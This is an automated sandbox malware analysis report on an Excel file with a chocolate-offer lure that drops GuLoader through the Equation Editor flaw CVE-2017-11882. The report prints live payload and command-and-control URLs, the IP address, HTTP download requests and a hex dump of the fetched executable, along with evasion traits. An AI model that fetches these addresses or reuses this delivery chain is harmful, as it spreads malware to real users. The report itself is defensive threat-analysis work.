Joe Sandbox Cloud Basic Analysis Report

Loading ...

Play interactive tourEdit tour

Windows Analysis Report MILKA CHOCO COW BISCUITS AND CADBURY OFFERS,TWIX,SNICKERS,BOUNTY,GALAXY.xlsx

Overview

General Information

Sample Name:MILKA CHOCO COW BISCUITS AND CADBURY OFFERS,TWIX,SNICKERS,BOUNTY,GALAXY.xlsx
Analysis ID:452495
MD5:b7cdda847140697b7bb7866b06d2a225
SHA1:874d1157c6e65813383c6b4bffd4d48948993c88
SHA256:1e7447cb7adb3336fcf6d2837781a2ab0d9f9fd3060cde3a47293bd34a883cdb
Tags:VelvetSweatshopxlsx
Infos:

Most interesting Screenshot:

Detection

GuLoader
Score:100
Range:0 - 100
Whitelisted:false
Confidence:100%

Signatures

Antivirus detection for URL or domain
Found malware configuration
Multi AV Scanner detection for dropped file
Sigma detected: Droppers Exploiting CVE-2017-11882
Sigma detected: EQNEDT32.EXE connecting to internet
Sigma detected: File Dropped By EQNEDT32EXE
Yara detected GuLoader
C2 URLs / IPs found in malware configuration
Contains functionality to detect hardware virtualization (CPUID execution measurement)
Detected RDTSC dummy instruction sequence (likely for instruction hammering)
Drops PE files to the user root directory
Office equation editor drops PE file
Office equation editor starts processes (likely CVE 2017-11882 or CVE-2018-0802)
Sigma detected: Execution from Suspicious Folder
Tries to detect virtualization through RDTSC time measurements
Abnormal high CPU Usage
Allocates memory within range which is reserved for system DLLs (kernel32.dll, advapi32.dll, etc)
Contains functionality for execution timing, often used to detect debuggers
Contains functionality to call native functions
Contains functionality to query CPU information (cpuid)
Contains functionality to read the PEB
Creates a process in suspended mode (likely to inject code)
Detected potential crypto function
Document misses a certain OLE stream usually present in this Microsoft Office document type
Downloads executable code via HTTP
Drops PE files
Drops PE files to the user directory
IP address seen in connection with other malware
Internet Provider seen in connection with other malware
May sleep (evasive loops) to hinder dynamic analysis
Office Equation Editor has been started
PE file contains strange resources
Potential document exploit detected (performs HTTP gets)
Potential document exploit detected (unknown TCP traffic)
Uses a known web browser user agent for HTTP communication
Uses code obfuscation techniques (call, push, ret)

Classification

Process Tree

  • System is w7x64
  • EXCEL.EXE (PID: 2368 cmdline: 'C:\Program Files\Microsoft Office\Office14\EXCEL.EXE' /automation -Embedding MD5: 5FB0A0F93382ECD19F5F499A5CAA59F0)
  • EQNEDT32.EXE (PID: 2124 cmdline: 'C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE' -Embedding MD5: A87236E214F6D42A65F5DEDAC816AEC8)
    • vbc.exe (PID: 2192 cmdline: 'C:\Users\Public\vbc.exe' MD5: C937FC9ED4325E6AB24D49A3175F3A5C)
  • cleanup

Malware Configuration

Threatname: GuLoader

{"Payload URL": "https://kinmirai.org/wp-content/bin_inUIdCgQk163.bin"}

Yara Overview

Memory Dumps

SourceRuleDescriptionAuthorStrings
00000006.00000002.2388759813.00000000002E0000.00000040.00000001.sdmpJoeSecurity_GuLoader_2Yara detected GuLoaderJoe Security

    Sigma Overview

    Exploits:

    barindex
    Sigma detected: EQNEDT32.EXE connecting to internetShow sources
    Source: Network ConnectionAuthor: Joe Security: Data: DestinationIp: 180.214.239.39, DestinationIsIpv6: false, DestinationPort: 80, EventID: 3, Image: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE, Initiated: true, ProcessId: 2124, Protocol: tcp, SourceIp: 192.168.2.22, SourceIsIpv6: false, SourcePort: 49167
    Sigma detected: File Dropped By EQNEDT32EXEShow sources
    Source: File createdAuthor: Joe Security: Data: EventID: 11, Image: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE, ProcessId: 2124, TargetFilename: C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\ZAE7RW1P\.svchost[1].exe

    System Summary:

    barindex
    Sigma detected: Droppers Exploiting CVE-2017-11882Show sources
    Source: Process startedAuthor: Florian Roth: Data: Command: 'C:\Users\Public\vbc.exe' , CommandLine: 'C:\Users\Public\vbc.exe' , CommandLine|base64offset|contains: , Image: C:\Users\Public\vbc.exe, NewProcessName: C:\Users\Public\vbc.exe, OriginalFileName: C:\Users\Public\vbc.exe, ParentCommandLine: 'C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE' -Embedding, ParentImage: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE, ParentProcessId: 2124, ProcessCommandLine: 'C:\Users\Public\vbc.exe' , ProcessId: 2192
    Sigma detected: Execution from Suspicious FolderShow sources
    Source: Process startedAuthor: Florian Roth: Data: Command: 'C:\Users\Public\vbc.exe' , CommandLine: 'C:\Users\Public\vbc.exe' , CommandLine|base64offset|contains: , Image: C:\Users\Public\vbc.exe, NewProcessName: C:\Users\Public\vbc.exe, OriginalFileName: C:\Users\Public\vbc.exe, ParentCommandLine: 'C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE' -Embedding, ParentImage: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE, ParentProcessId: 2124, ProcessCommandLine: 'C:\Users\Public\vbc.exe' , ProcessId: 2192

    Jbx Signature Overview

    Click to jump to signature section

    Show All Signature Results

    AV Detection:

    barindex
    Antivirus detection for URL or domainShow sources
    Source: http://180.214.239.39/process/.svchost.exeAvira URL Cloud: Label: malware
    Found malware configurationShow sources
    Source: 00000006.00000002.2388759813.00000000002E0000.00000040.00000001.sdmpMalware Configuration Extractor: GuLoader {"Payload URL": "https://kinmirai.org/wp-content/bin_inUIdCgQk163.bin"}
    Multi AV Scanner detection for dropped fileShow sources
    Source: C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\ZAE7RW1P\.svchost[1].exeReversingLabs: Detection: 42%
    Source: C:\Users\Public\vbc.exeReversingLabs: Detection: 42%

    Exploits:

    barindex
    Office equation editor starts processes (likely CVE 2017-11882 or CVE-2018-0802)Show sources
    Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXEProcess created: C:\Users\Public\vbc.exe
    Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXEProcess created: C:\Users\Public\vbc.exe
    Source: unknownProcess created: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE 'C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE' -Embedding
    Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEFile opened: C:\Windows\WinSxS\amd64_microsoft.vc90.crt_1fc8b3b9a1e18e3b_9.0.30729.4940_none_08e4299fa83d7e3c\MSVCR90.dll
    Source: Binary string: C:\Program Files (x86)\Administrator-Cloud\Projects\Interrup.pdb source: .svchost[1].exe.4.dr
    Source: global trafficTCP traffic: 192.168.2.22:49167 -> 180.214.239.39:80
    Source: global trafficTCP traffic: 192.168.2.22:49167 -> 180.214.239.39:80

    Networking:

    barindex
    C2 URLs / IPs found in malware configurationShow sources
    Source: Malware configuration extractorURLs: https://kinmirai.org/wp-content/bin_inUIdCgQk163.bin
    Source: global trafficHTTP traffic detected: HTTP/1.1 200 OKDate: Thu, 22 Jul 2021 11:50:59 GMTServer: Apache/2.4.47 (Win64) OpenSSL/1.1.1k PHP/7.3.28Last-Modified: Wed, 21 Jul 2021 22:37:17 GMTETag: "3c468-5c7a9d0090119"Accept-Ranges: bytesContent-Length: 246888Keep-Alive: timeout=5, max=100Connection: Keep-AliveContent-Type: application/x-msdownloadData Raw: 4d 5a 90 00 03 00 00 00 04 00 00 00 ff ff 00 00 b8 00 00 00 00 00 00 00 40 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 b8 00 00 00 0e 1f ba 0e 00 b4 09 cd 21 b8 01 4c cd 21 54 68 69 73 20 70 72 6f 67 72 61 6d 20 63 61 6e 6e 6f 74 20 62 65 20 72 75 6e 20 69 6e 20 44 4f 53 20 6d 6f 64 65 2e 0d 0d 0a 24 00 00 00 00 00 00 00 c7 bf 79 da 83 de 17 89 83 de 17 89 83 de 17 89 00 c2 19 89 82 de 17 89 cc fc 1e 89 87 de 17 89 b5 f8 1a 89 82 de 17 89 52 69 63 68 83 de 17 89 00 00 00 00 00 00 00 00 50 45 00 00 4c 01 03 00 82 b6 5c 53 00 00 00 00 00 00 00 00 e0 00 0f 01 0b 01 06 00 00 30 03 00 00 70 00 00 00 00 00 00 30 13 00 00 00 10 00 00 00 40 03 00 00 00 40 00 00 10 00 00 00 10 00 00 04 00 00 00 07 00 00 00 04 00 00 00 00 00 00 00 00 b0 03 00 00 10 00 00 19 f9 03 00 02 00 00 00 00 00 10 00 00 10 00 00 00 00 10 00 00 10 00 00 00 00 00 00 10 00 00 00 00 00 00 00 00 00 00 00 74 30 03 00 28 00 00 00 00 50 03 00 c4 54 00 00 00 00 00 00 00 00 00 00 58 b0 03 00 10 14 00 00 00 00 00 00 00 00 00 00 00 11 00 00 1c 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 28 02 00 00 20 00 00 00 00 10 00 00 f8 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 2e 74 65 78 74 00 00 00 c0 24 03 00 00 10 00 00 00 30 03 00 00 10 00 00 00 00 00 00 00 00 00 00 00 00 00 00 20 00 00 60 2e 64 61 74 61 00 00 00 90 0b 00 00 00 40 03 00 00 10 00 00 00 40 03 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 c0 2e 72 73 72 63 00 00 00 c4 54 00 00 00 50 03 00 00 60 00 00 00 50 03 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 40 c3 1f b0 49 10 00 00 00 00 00 00 00 00 00 00 00 4d 53 56 42 56 4d 36 30 2e 44 4c 4c 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 0
    Source: Joe Sandbox ViewIP Address: 180.214.239.39 180.214.239.39
    Source: Joe Sandbox ViewASN Name: VNPT-AS-VNVIETNAMPOSTSANDTELECOMMUNICATIONSGROUPVN VNPT-AS-VNVIETNAMPOSTSANDTELECOMMUNICATIONSGROUPVN
    Source: global trafficHTTP traffic detected: GET /process/.svchost.exe HTTP/1.1Accept: */*Accept-Encoding: gzip, deflateUser-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; WOW64; Trident/7.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; .NET4.0C; .NET4.0E)Host: 180.214.239.39Connection: Keep-Alive
    Source: unknownTCP traffic detected without corresponding DNS query: 180.214.239.39
    Source: unknownTCP traffic detected without corresponding DNS query: 180.214.239.39
    Source: unknownTCP traffic detected without corresponding DNS query: 180.214.239.39
    Source: unknownTCP traffic detected without corresponding DNS query: 180.214.239.39
    Source: unknownTCP traffic detected without corresponding DNS query: 180.214.239.39
    Source: unknownTCP traffic detected without corresponding DNS query: 180.214.239.39
    Source: unknownTCP traffic detected without corresponding DNS query: 180.214.239.39
    Source: unknownTCP traffic detected without corresponding DNS query: 180.214.239.39
    Source: unknownTCP traffic detected without corresponding DNS query: 180.214.239.39
    Source: unknownTCP traffic detected without corresponding DNS query: 180.214.239.39
    Source: unknownTCP traffic detected without corresponding DNS query: 180.214.239.39
    Source: unknownTCP traffic detected without corresponding DNS query: 180.214.239.39
    Source: unknownTCP traffic detected without corresponding DNS query: 180.214.239.39
    Source: unknownTCP traffic detected without corresponding DNS query: 180.214.239.39
    Source: unknownTCP traffic detected without corresponding DNS query: 180.214.239.39
    Source: unknownTCP traffic detected without corresponding DNS query: 180.214.239.39
    Source: unknownTCP traffic detected without corresponding DNS query: 180.214.239.39
    Source: unknownTCP traffic detected without corresponding DNS query: 180.214.239.39
    Source: unknownTCP traffic detected without corresponding DNS query: 180.214.239.39
    Source: unknownTCP traffic detected without corresponding DNS query: 180.214.239.39
    Source: unknownTCP traffic detected without corresponding DNS query: 180.214.239.39
    Source: unknownTCP traffic detected without corresponding DNS query: 180.214.239.39
    Source: unknownTCP traffic detected without corresponding DNS query: 180.214.239.39
    Source: unknownTCP traffic detected without corresponding DNS query: 180.214.239.39
    Source: unknownTCP traffic detected without corresponding DNS query: 180.214.239.39
    Source: unknownTCP traffic detected without corresponding DNS query: 180.214.239.39
    Source: unknownTCP traffic detected without corresponding DNS query: 180.214.239.39
    Source: unknownTCP traffic detected without corresponding DNS query: 180.214.239.39
    Source: unknownTCP traffic detected without corresponding DNS query: 180.214.239.39
    Source: unknownTCP traffic detected without corresponding DNS query: 180.214.239.39
    Source: unknownTCP traffic detected without corresponding DNS query: 180.214.239.39
    Source: unknownTCP traffic detected without corresponding DNS query: 180.214.239.39
    Source: unknownTCP traffic detected without corresponding DNS query: 180.214.239.39
    Source: unknownTCP traffic detected without corresponding DNS query: 180.214.239.39
    Source: unknownTCP traffic detected without corresponding DNS query: 180.214.239.39
    Source: unknownTCP traffic detected without corresponding DNS query: 180.214.239.39
    Source: unknownTCP traffic detected without corresponding DNS query: 180.214.239.39
    Source: unknownTCP traffic detected without corresponding DNS query: 180.214.239.39
    Source: unknownTCP traffic detected without corresponding DNS query: 180.214.239.39
    Source: unknownTCP traffic detected without corresponding DNS query: 180.214.239.39
    Source: unknownTCP traffic detected without corresponding DNS query: 180.214.239.39
    Source: unknownTCP traffic detected without corresponding DNS query: 180.214.239.39
    Source: unknownTCP traffic detected without corresponding DNS query: 180.214.239.39
    Source: unknownTCP traffic detected without corresponding DNS query: 180.214.239.39
    Source: unknownTCP traffic detected without corresponding DNS query: 180.214.239.39
    Source: unknownTCP traffic detected without corresponding DNS query: 180.214.239.39
    Source: unknownTCP traffic detected without corresponding DNS query: 180.214.239.39
    Source: unknownTCP traffic detected without corresponding DNS query: 180.214.239.39
    Source: unknownTCP traffic detected without corresponding DNS query: 180.214.239.39
    Source: unknownTCP traffic detected without corresponding DNS query: 180.214.239.39
    Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEFile created: C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.MSO\F70A7842.emfJump to behavior
    Source: global trafficHTTP traffic detected: GET /process/.svchost.exe HTTP/1.1Accept: */*Accept-Encoding: gzip, deflateUser-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; WOW64; Trident/7.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; .NET4.0C; .NET4.0E)Host: 180.214.239.39Connection: Keep-Alive
    Source: .svchost[1].exe.4.drString found in binary or memory: http://cacerts.digicert.com/DigiCertAssuredIDRootCA.crt0
    Source: .svchost[1].exe.4.drString found in binary or memory: http://cacerts.digicert.com/DigiCertSHA2AssuredIDTimestampingCA.crt0
    Source: .svchost[1].exe.4.drString found in binary or memory: http://crl3.digicert.com/DigiCertAssuredIDRootCA.crl0P
    Source: .svchost[1].exe.4.drString found in binary or memory: http://crl3.digicert.com/sha2-assured-ts.crl02
    Source: .svchost[1].exe.4.drString found in binary or memory: http://crl4.digicert.com/DigiCertAssuredIDRootCA.crl0:
    Source: .svchost[1].exe.4.drString found in binary or memory: http://crl4.digicert.com/sha2-assured-ts.crl0
    Source: .svchost[1].exe.4.drString found in binary or memory: http://ocsp.digicert.com0C
    Source: .svchost[1].exe.4.drString found in binary or memory: http://ocsp.digicert.com0O
    Source: F70A7842.emf.0.drString found in binary or memory: http://www.day.com/dam/1.0
    Source: .svchost[1].exe.4.drString found in binary or memory: http://www.digicert.com/CPS0
    Source: .svchost[1].exe.4.drString found in binary or memory: https://www.digicert.com/CPS0

    System Summary:

    barindex
    Office equation editor drops PE fileShow sources
    Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXEFile created: C:\Users\Public\vbc.exeJump to dropped file
    Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXEFile created: C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\ZAE7RW1P\.svchost[1].exeJump to dropped file
    Source: C:\Users\Public\vbc.exeProcess Stats: CPU usage > 98%
    Source: C:\Users\Public\vbc.exeMemory allocated: 76E20000 page execute and read and write
    Source: C:\Users\Public\vbc.exeMemory allocated: 76D20000 page execute and read and write
    Source: C:\Users\Public\vbc.exeCode function: 6_2_002E543B NtAllocateVirtualMemory,
    Source: C:\Users\Public\vbc.exeCode function: 6_2_002E5540 NtAllocateVirtualMemory,
    Source: C:\Users\Public\vbc.exeCode function: 6_2_002E543B
    Source: C:\Users\Public\vbc.exeCode function: 6_2_002E2C2A
    Source: C:\Users\Public\vbc.exeCode function: 6_2_002E8C36
    Source: C:\Users\Public\vbc.exeCode function: 6_2_002E841E
    Source: C:\Users\Public\vbc.exeCode function: 6_2_002E4860
    Source: C:\Users\Public\vbc.exeCode function: 6_2_002E7077
    Source: C:\Users\Public\vbc.exeCode function: 6_2_002E0C4C
    Source: C:\Users\Public\vbc.exeCode function: 6_2_002E8C42
    Source: C:\Users\Public\vbc.exeCode function: 6_2_002E0C54
    Source: C:\Users\Public\vbc.exeCode function: 6_2_002E2455
    Source: C:\Users\Public\vbc.exeCode function: 6_2_002E80A4
    Source: C:\Users\Public\vbc.exeCode function: 6_2_002E28A0
    Source: C:\Users\Public\vbc.exeCode function: 6_2_002E048D
    Source: C:\Users\Public\vbc.exeCode function: 6_2_002E0889
    Source: C:\Users\Public\vbc.exeCode function: 6_2_002E80EF
    Source: C:\Users\Public\vbc.exeCode function: 6_2_002E48E9
    Source: C:\Users\Public\vbc.exeCode function: 6_2_002E80C6
    Source: C:\Users\Public\vbc.exeCode function: 6_2_002E0CC3
    Source: C:\Users\Public\vbc.exeCode function: 6_2_002E38D1
    Source: C:\Users\Public\vbc.exeCode function: 6_2_002E3D2C
    Source: C:\Users\Public\vbc.exeCode function: 6_2_002E7D3E
    Source: C:\Users\Public\vbc.exeCode function: 6_2_002E5908
    Source: C:\Users\Public\vbc.exeCode function: 6_2_002E7D06
    Source: C:\Users\Public\vbc.exeCode function: 6_2_002E4105
    Source: C:\Users\Public\vbc.exeCode function: 6_2_002E2518
    Source: C:\Users\Public\vbc.exeCode function: 6_2_002E0916
    Source: C:\Users\Public\vbc.exeCode function: 6_2_002E4912
    Source: C:\Users\Public\vbc.exeCode function: 6_2_002E517E
    Source: C:\Users\Public\vbc.exeCode function: 6_2_002E0147
    Source: C:\Users\Public\vbc.exeCode function: 6_2_002E5D43
    Source: C:\Users\Public\vbc.exeCode function: 6_2_002E15BD
    Source: C:\Users\Public\vbc.exeCode function: 6_2_002E05B1
    Source: C:\Users\Public\vbc.exeCode function: 6_2_002E3D84
    Source: C:\Users\Public\vbc.exeCode function: 6_2_002E322C
    Source: C:\Users\Public\vbc.exeCode function: 6_2_002E2228
    Source: C:\Users\Public\vbc.exeCode function: 6_2_002E1A21
    Source: C:\Users\Public\vbc.exeCode function: 6_2_002E163B
    Source: C:\Users\Public\vbc.exeCode function: 6_2_002E421B
    Source: C:\Users\Public\vbc.exeCode function: 6_2_002E3A18
    Source: C:\Users\Public\vbc.exeCode function: 6_2_002E3A69
    Source: C:\Users\Public\vbc.exeCode function: 6_2_002E1A78
    Source: C:\Users\Public\vbc.exeCode function: 6_2_002E3259
    Source: C:\Users\Public\vbc.exeCode function: 6_2_002E3684
    Source: C:\Users\Public\vbc.exeCode function: 6_2_002E42C0
    Source: C:\Users\Public\vbc.exeCode function: 6_2_002E3ED8
    Source: C:\Users\Public\vbc.exeCode function: 6_2_002E832E
    Source: C:\Users\Public\vbc.exeCode function: 6_2_002E3325
    Source: C:\Users\Public\vbc.exeCode function: 6_2_002E6B35
    Source: C:\Users\Public\vbc.exeCode function: 6_2_002E770F
    Source: C:\Users\Public\vbc.exeCode function: 6_2_002E4712
    Source: C:\Users\Public\vbc.exeCode function: 6_2_002E6B7B
    Source: C:\Users\Public\vbc.exeCode function: 6_2_002E2379
    Source: C:\Users\Public\vbc.exeCode function: 6_2_002E7F4E
    Source: C:\Users\Public\vbc.exeCode function: 6_2_002E475F
    Source: C:\Users\Public\vbc.exeCode function: 6_2_002E6FAF
    Source: C:\Users\Public\vbc.exeCode function: 6_2_002E27A4
    Source: C:\Users\Public\vbc.exeCode function: 6_2_002E7BA4
    Source: C:\Users\Public\vbc.exeCode function: 6_2_002E47A2
    Source: C:\Users\Public\vbc.exeCode function: 6_2_002E87BC
    Source: C:\Users\Public\vbc.exeCode function: 6_2_002E23FF
    Source: C:\Users\Public\vbc.exeCode function: 6_2_002E47C8
    Source: C:\Users\Public\vbc.exeCode function: 6_2_002E0BDC
    Source: MILKA CHOCO COW BISCUITS AND CADBURY OFFERS,TWIX,SNICKERS,BOUNTY,GALAXY.xlsxOLE stream indicators for Word, Excel, PowerPoint, and Visio: all false
    Source: .svchost[1].exe.4.drStatic PE information: Resource name: RT_ICON type: GLS_BINARY_LSB_FIRST
    Source: .svchost[1].exe.4.drStatic PE information: Resource name: RT_ICON type: GLS_BINARY_LSB_FIRST
    Source: .svchost[1].exe.4.drStatic PE information: Resource name: RT_ICON type: GLS_BINARY_LSB_FIRST
    Source: vbc.exe.4.drStatic PE information: Resource name: RT_ICON type: GLS_BINARY_LSB_FIRST
    Source: vbc.exe.4.drStatic PE information: Resource name: RT_ICON type: GLS_BINARY_LSB_FIRST
    Source: vbc.exe.4.drStatic PE information: Resource name: RT_ICON type: GLS_BINARY_LSB_FIRST
    Source: classification engineClassification label: mal100.troj.expl.evad.winXLSX@4/13@0/1
    Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEFile created: C:\Users\user\Desktop\~$MILKA CHOCO COW BISCUITS AND CADBURY OFFERS,TWIX,SNICKERS,BOUNTY,GALAXY.xlsxJump to behavior
    Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEFile created: C:\Users\user\AppData\Local\Temp\CVR164D.tmpJump to behavior
    Source: C:\Users\Public\vbc.exeSection loaded: C:\Windows\SysWOW64\msvbvm60.dll
    Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEFile read: C:\Users\desktop.iniJump to behavior
    Source: C:\Users\Public\vbc.exeKey opened: HKEY_CURRENT_USER\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiers
    Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXEFile read: C:\Windows\System32\drivers\etc\hostsJump to behavior
    Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXEFile read: C:\Windows\System32\drivers\etc\hostsJump to behavior
    Source: unknownProcess created: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE 'C:\Program Files\Microsoft Office\Office14\EXCEL.EXE' /automation -Embedding
    Source: unknownProcess created: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE 'C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE' -Embedding
    Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXEProcess created: C:\Users\Public\vbc.exe 'C:\Users\Public\vbc.exe'
    Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXEProcess created: C:\Users\Public\vbc.exe 'C:\Users\Public\vbc.exe'
    Source: Window RecorderWindow detected: More than 3 window changes detected
    Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEKey opened: HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Excel\Resiliency\StartupItems
    Source: MILKA CHOCO COW BISCUITS AND CADBURY OFFERS,TWIX,SNICKERS,BOUNTY,GALAXY.xlsxStatic file information: File size 1267200 > 1048576
    Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEFile opened: C:\Windows\WinSxS\amd64_microsoft.vc90.crt_1fc8b3b9a1e18e3b_9.0.30729.4940_none_08e4299fa83d7e3c\MSVCR90.dll
    Source: Binary string: C:\Program Files (x86)\Administrator-Cloud\Projects\Interrup.pdb source: .svchost[1].exe.4.dr
    Source: MILKA CHOCO COW BISCUITS AND CADBURY OFFERS,TWIX,SNICKERS,BOUNTY,GALAXY.xlsxInitial sample: OLE indicators vbamacros = False
    Source: MILKA CHOCO COW BISCUITS AND CADBURY OFFERS,TWIX,SNICKERS,BOUNTY,GALAXY.xlsxInitial sample: OLE indicators encrypted = True

    Data Obfuscation:

    barindex
    Yara detected GuLoaderShow sources
    Source: Yara matchFile source: 00000006.00000002.2388759813.00000000002E0000.00000040.00000001.sdmp, type: MEMORY
    Source: C:\Users\Public\vbc.exeCode function: 6_2_002212F5 push edx; ret
    Source: C:\Users\Public\vbc.exeCode function: 6_2_00221023 push edx; ret
    Source: C:\Users\Public\vbc.exeCode function: 6_2_00222823 push edx; ret
    Source: C:\Users\Public\vbc.exeCode function: 6_2_00224023 push edx; ret
    Source: C:\Users\Public\vbc.exeCode function: 6_2_00227024 push edx; ret
    Source: C:\Users\Public\vbc.exeCode function: 6_2_00225825 push edx; ret
    Source: C:\Users\Public\vbc.exeCode function: 6_2_00224833 push edx; ret
    Source: C:\Users\Public\vbc.exeCode function: 6_2_00223033 push edx; ret
    Source: C:\Users\Public\vbc.exeCode function: 6_2_00221833 push edx; ret
    Source: C:\Users\Public\vbc.exeCode function: 6_2_00226034 push edx; ret
    Source: C:\Users\Public\vbc.exeCode function: 6_2_00220038 push edx; ret
    Source: C:\Users\Public\vbc.exeCode function: 6_2_00224803 push edx; ret
    Source: C:\Users\Public\vbc.exeCode function: 6_2_00223003 push edx; ret
    Source: C:\Users\Public\vbc.exeCode function: 6_2_00221803 push edx; ret
    Source: C:\Users\Public\vbc.exeCode function: 6_2_00226004 push edx; ret
    Source: C:\Users\Public\vbc.exeCode function: 6_2_00220008 push edx; ret
    Source: C:\Users\Public\vbc.exeCode function: 6_2_00223813 push edx; ret
    Source: C:\Users\Public\vbc.exeCode function: 6_2_00225013 push edx; ret
    Source: C:\Users\Public\vbc.exeCode function: 6_2_00222014 push edx; ret
    Source: C:\Users\Public\vbc.exeCode function: 6_2_00226814 push edx; ret
    Source: C:\Users\Public\vbc.exeCode function: 6_2_00220818 push edx; ret
    Source: C:\Users\Public\vbc.exeCode function: 6_2_00223063 push edx; ret
    Source: C:\Users\Public\vbc.exeCode function: 6_2_00221863 push edx; ret
    Source: C:\Users\Public\vbc.exeCode function: 6_2_00224863 push edx; ret
    Source: C:\Users\Public\vbc.exeCode function: 6_2_00226065 push edx; ret
    Source: C:\Users\Public\vbc.exeCode function: 6_2_00220068 push edx; ret
    Source: C:\Users\Public\vbc.exeCode function: 6_2_00222074 push edx; ret
    Source: C:\Users\Public\vbc.exeCode function: 6_2_00223874 push edx; ret
    Source: C:\Users\Public\vbc.exeCode function: 6_2_00225074 push edx; ret
    Source: C:\Users\Public\vbc.exeCode function: 6_2_00226875 push edx; ret
    Source: C:\Users\Public\vbc.exeCode function: 6_2_00220878 push edx; ret
    Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXEFile created: C:\Users\Public\vbc.exeJump to dropped file
    Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXEFile created: C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\ZAE7RW1P\.svchost[1].exeJump to dropped file
    Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXEFile created: C:\Users\Public\vbc.exeJump to dropped file

    Boot Survival:

    barindex
    Drops PE files to the user root directoryShow sources
    Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXEFile created: C:\Users\Public\vbc.exeJump to dropped file
    Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEProcess information set: NOOPENFILEERRORBOX
    Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEProcess information set: NOOPENFILEERRORBOX
    Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEProcess information set: NOOPENFILEERRORBOX
    Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEProcess information set: NOOPENFILEERRORBOX
    Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEProcess information set: NOOPENFILEERRORBOX
    Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEProcess information set: NOOPENFILEERRORBOX
    Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEProcess information set: NOOPENFILEERRORBOX
    Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEProcess information set: NOOPENFILEERRORBOX
